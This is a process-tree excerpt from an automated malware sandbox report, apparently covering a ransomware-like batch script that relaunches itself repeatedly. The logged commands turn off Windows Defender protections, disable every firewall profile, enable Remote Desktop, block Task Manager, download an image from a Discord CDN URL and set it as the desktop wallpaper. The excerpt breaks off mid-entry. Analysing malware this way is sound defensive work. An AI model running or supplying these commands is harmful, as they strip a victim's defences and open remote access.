C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:4880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:3680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:3344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵PID:4636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:4500
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:4132
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:4996
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:1308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:3208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:4112 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵
- Modifies Windows Firewall
PID:1304 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵
- Modifies Windows Firewall
PID:792 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:3936
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵
- Modifies Windows Firewall
PID:2192 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:4016
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:1048
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵PID:3256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:4240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:1284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:5108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵
- Blocklisted process makes network request
PID:1832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵PID:4232
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:1528
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:4664
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:4708
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:4240
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:1256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:1468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:4216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:1436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:4916
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:4964
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:1536
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵
- Modifies Windows Firewall
PID:1800 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵
- Modifies Windows Firewall
PID:4796 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵PID:2436
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵
- Modifies Windows Firewall
PID:4144 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵
- Modifies Windows Firewall
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:1420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:3996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:4704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:4108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:1300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵PID:4356
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:4164
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:3860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:5072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:2948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2384
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵PID:4012
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵PID:508
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵
- Modifies Windows Firewall
PID:3340 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵
- Modifies Windows Firewall
PID:4916 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵
- Modifies Windows Firewall
PID:4016 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:3784
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵
- Modifies Windows Firewall
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:4640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:2640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵PID:3816
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:3428
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:3552
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:3520
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:2052
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:1492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:4264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4256
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵
- Modifies Windows Firewall
PID:2592 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵
- Modifies Windows Firewall
PID:2112 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵
- Modifies Windows Firewall
PID:1232 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵
- Modifies Windows Firewall
PID:1300 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵
- Modifies Windows Firewall
PID:676 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵
- Modifies Windows Firewall
PID:4148 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵
- Modifies Windows Firewall
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:4728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:1420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵PID:5084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:1236
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:1304
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:3600
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:3816
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:3540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:1336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:2800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:4684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3532 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵
- Modifies Windows Firewall
PID:3076 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:4608 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵
- Modifies Windows Firewall
PID:616 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵
- Modifies Windows Firewall
PID:4344 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵
- Modifies Windows Firewall
PID:4204 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵
- Modifies Windows Firewall
PID:3688 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:1416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:1968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:3520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:2896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:1588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵PID:2940
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:216
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:676
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:3616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:1856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:3208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:4140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:2940 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵PID:2932
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵
- Modifies Windows Firewall
PID:3996 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:4380
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵
- Modifies Windows Firewall
PID:3948 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:3540 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:3704
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:3704 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:3348 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:4972
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵
- Sets desktop wallpaper using registry
PID:1440 -
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 24
PID:1148
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 22
- Sets desktop wallpaper using registry
PID:1100
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 22
PID:3948
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 20
- Sets desktop wallpaper using registry
PID:2792
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 20
PID:4312
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 18
- Sets desktop wallpaper using registry
PID:992
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 18
PID:4108
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 16
- Sets desktop wallpaper using registry
PID:3948
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 16
PID:4964
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 14
- Sets desktop wallpaper using registry
PID:3344
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 14
PID:5040
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 12
- Sets desktop wallpaper using registry
PID:2276
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 12
PID:4380
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 10
- Sets desktop wallpaper using registry
PID:1856
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 10
PID:2320
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 8
- Sets desktop wallpaper using registry
PID:4344
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 8
PID:640
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 6
- Sets desktop wallpaper using registry
PID:4240
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 6
PID:2320
-
C:\Windows\system32\reg.exe
Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
Tree depth: 4
- Sets desktop wallpaper using registry
PID:4796
-
C:\Windows\system32\rundll32.exe
Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Tree depth: 4
PID:2640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
Tree depth: 1
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2756
-
C:\Windows\system32\browser_broker.exe
Command line: C:\Windows\system32\browser_broker.exe -Embedding
Tree depth: 1
- Modifies Internet Explorer settings
PID:2728
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Tree depth: 1
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Tree depth: 1
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Tree depth: 1
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
